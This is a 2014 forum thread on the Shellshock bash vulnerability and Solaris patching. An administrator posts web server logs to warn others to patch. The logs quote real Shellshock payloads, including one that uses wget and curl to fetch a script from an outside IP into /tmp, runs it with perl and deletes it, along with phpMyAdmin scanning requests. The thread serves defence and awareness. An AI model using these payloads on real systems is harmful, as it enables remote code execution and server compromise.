Solaris bash vulnerability update


 
Thread Tools Search this Thread
Operating Systems Solaris Solaris bash vulnerability update
# 1  
Old 09-27-2014
Solaris bash vulnerability update

The patch blog has:

https://blogs.oracle.com/patch/entry...ailable_on_mos

information on dealing with bash 'shellshock' vulnerability.
These 4 Users Gave Thanks to jim mcnamara For This Post:
# 2  
Old 09-28-2014
I don't understand this bug. Does attacker need account?
# 3  
Old 09-28-2014
Hi,

No, the attack does not require the attacker to have an account. They can make use of the account that is running the service that they attack through.

As an example, if you have a web server running - it would normally be run by a user. This could be "apache", "webserver" or if you are very unlucky "root".

The "shellshock" vulnerability will allow an attacker to leverage the owner of a service privileges to potentially gain access to some or all of a server or it's data.

I have seen a large number of assaults on my estate, below are the typical things that you are seeing. So far I haven't had any serious problems, I had started patching before the first attack so was lucky.

Code:
XXX.XXX.93.149 - - [25/Sep/2014:05:08:03 +0100] "GET /w00tw00t.at.blackhats.aaaaaa.aaaa-sec:) HTTP/1.1" 404 319 "-" "ZmEu"
XXX.XXX.93.149 - - [25/Sep/2014:05:08:03 +0100] "GET /something_here/scripts/setup.php HTTP/1.1" 404 306 "-" "ZmEu"
XXX.XX.69.74 - - [25/Sep/2014:18:53:51 +0100] "GET / HTTP/1.1" 200 2455 "() { :; }; /bin/ping -c 1 XXX.XXX.0.69" "() { :; }; /bin/ping -c 1 XXX.XXX.0.69"

As you'll probably be able to see from the above, the attempts to gain access are coming from different IP Addresses I now have lists of several hundred. The most common seem to be trying to gain access to things like Mysql databases, firewall block lists and attempts to clear them along with access to a host of standard setup utilities.

The /bin/ping could just as easily be a "wget" or "ftp" placing malicious code or a million other things designed to make a systems admin unhappy.

Regards

Dave

Last edited by gull04; 09-28-2014 at 08:16 PM.. Reason: More info.
These 2 Users Gave Thanks to gull04 For This Post:
# 4  
Old 09-30-2014
Hi Guys,

Just to let you know, if you are running any internet facing servers with the bash (shellshock) vulnerability still evident you are risking a major intrusion. I am now seeing a spike in activity, complexity and frequency of the attempts on my web servers.

Here is a sample of what I'm seeing.

Code:
54.251.83.67 - - [29/Sep/2014:01:36:14 +0100] "GET / HTTP/1.1" 200 2455 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
173.45.100.18 - - [29/Sep/2014:01:44:17 +0100] "GET /cgi-bin/ HTTP/1.1" 403 290 "-" "-"
173.45.100.18 - - [29/Sep/2014:01:44:18 +0100] "GET /cgi-bin/hi HTTP/1.0" 404 288 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""

So if you're still unpatched - best get to it. The more advanced guys will be along very soon now.

There is still the script kiddy stuff as well, typically stuff like this.

Code:
210.51.47.229 - - [29/Sep/2014:11:29:43 +0100] "GET /muieblackcat HTTP/1.1" 404 290 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:44 +0100] "GET //scripts/setup.php HTTP/1.1" 404 295 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:45 +0100] "GET //admin/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:45 +0100] "GET //admin/pma/scripts/setup.php HTTP/1.1" 404 305 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:46 +0100] "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:47 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 298 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:47 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:48 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:49 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:49 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:50 +0100] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:51 +0100] "GET //phpadmin/scripts/setup.php HTTP/1.1" 404 304 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:51 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:52 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:53 +0100] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:54 +0100] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:54 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:55 +0100] "GET //web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 310 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:56 +0100] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:56 +0100] "GET //web/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:57 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:58 +0100] "GET //websql/scripts/setup.php HTTP/1.1" 404 302 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:58 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:59 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:00 +0100] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:00 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:01 +0100] "GET //phpMyAdmin-2.5.5/index.php HTTP/1.1" 404 304 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:02 +0100] "GET //phpMyAdmin-2.5.5-pl1/index.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:02 +0100] "GET /muieblackcat HTTP/1.1" 404 290 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:03 +0100] "GET //scripts/setup.php HTTP/1.1" 404 295 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:03 +0100] "GET //admin/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:04 +0100] "GET //admin/pma/scripts/setup.php HTTP/1.1" 404 305 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:05 +0100] "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:05 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 298 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:06 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:07 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:07 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:08 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:09 +0100] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:10 +0100] "GET //phpadmin/scripts/setup.php HTTP/1.1" 404 304 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:10 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:11 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:12 +0100] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:12 +0100] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:13 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:14 +0100] "GET //web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 310 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:14 +0100] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:15 +0100] "GET //web/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:16 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:16 +0100] "GET //websql/scripts/setup.php HTTP/1.1" 404 302 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:17 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:18 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:18 +0100] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:19 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:20 +0100] "GET //phpMyAdmin-2.5.5/index.php HTTP/1.1" 404 304 "-" "-"

But even that will improve, so better safe than sorry.

Regards

Dave
This User Gave Thanks to gull04 For This Post:
Login or Register to Ask a Question

Previous Thread | Next Thread

10 More Discussions You Might Find Interesting

1. Solaris

How to update Solaris 10 Update 3 to Update 11?

Hi friends, We have a Solaris machine running 10 update 3 -bash-3.2# cat /etc/release Solaris 10 11/06 s10s_u3wos_10 SPARC Copyright 2006 Sun Microsystems, Inc. All Rights Reserved. Use is subject to license terms. ... (6 Replies)
Discussion started by: prvnrk
6 Replies

2. Shell Programming and Scripting

Bash FPATH code update

In this post at 302451613-post2.html the link to the code comes up not found. The thread is closed, so I was unable to ask on the thread itself and I do not have enough posts yet to send a private message (or write out a proper html link). Does the author (jim mcanamara) have an updated link? ... (2 Replies)
Discussion started by: matthewpersico
2 Replies

3. Shell Programming and Scripting

Bash to update files to be used by awk

In the below bash there are 6 .txt files in /home/cmccabe/Desktop/comparison/ref_val/ that are being updated from the 6 .vcf files in /home/cmccabe/Desktop/comparison/validation/files/*.vcf. The awk in the post updates the files with the information, however the files are not being updated so the... (0 Replies)
Discussion started by: cmccabe
0 Replies

4. Red Hat

RedHat 5 update 9 BASH update issue

Hi i want to update the BASH because of the "shell shock" vulnerability. my RedHat 5 is clean install with the default mirror site. when im running the command: yum update bash im getting a message saying there is no update. you can see in the attach picture... what am i doing wrong? is... (4 Replies)
Discussion started by: guy3145
4 Replies

5. News, Links, Events and Announcements

Bash vulnerability

Not sure if there is a post about it here somewhere already. Anyway: Remote exploit vulnerability in bash CVE-2014-6271 | CSO Online (3 Replies)
Discussion started by: zaxxon
3 Replies

6. Shell Programming and Scripting

Update a mysql column via bash script

Hello, I want to check the value of all MySQL columns.(column name is "status") via bash script. If value is "0" at I want to make only single column value to "1" I have many "0" values on mysql database(on "status" column) "0" means it is a draft post. I want to publish a post. I... (2 Replies)
Discussion started by: tara123
2 Replies

7. Shell Programming and Scripting

Update ksh .profile to launch bash

Hi I don't have chsh option. I want to launch bash instead of ksh ( or launch bash from ksh .profile) how can I do this ? (1 Reply)
Discussion started by: Sivaswami
1 Replies

8. Solaris

Install update 6 on solaris with update 3

I want to update my solaris 10 server which is currently on update 3 stage. A new application require it to be on update 6. What is the best way to make it update 6. should i just install the patch or should i go for the liveupgrade?? thanks for you help in advance (3 Replies)
Discussion started by: uxravi
3 Replies

9. Solaris

Undo the Veritas mirroring and update from Solaris 8 to Solaris 10

Hi all I wish to undo the mirroring for root and update the Solaris version from 8 to 10. Since i am lack of knowledge and experience on this, hope you all can help me double check the step and correct me. Existing disk groups details root@leo # vxdg list NAME STATE ID... (3 Replies)
Discussion started by: SmartAntz
3 Replies

10. Shell Programming and Scripting

Constant update echo in BASH

Hi all, Basically Im trying to put the current time in a script in BASH. Tried the watch command, but its not really what I want. I will have lots of things in this script, current date and time being just a few). Any ideas? (4 Replies)
Discussion started by: mikejreading
4 Replies
Login or Register to Ask a Question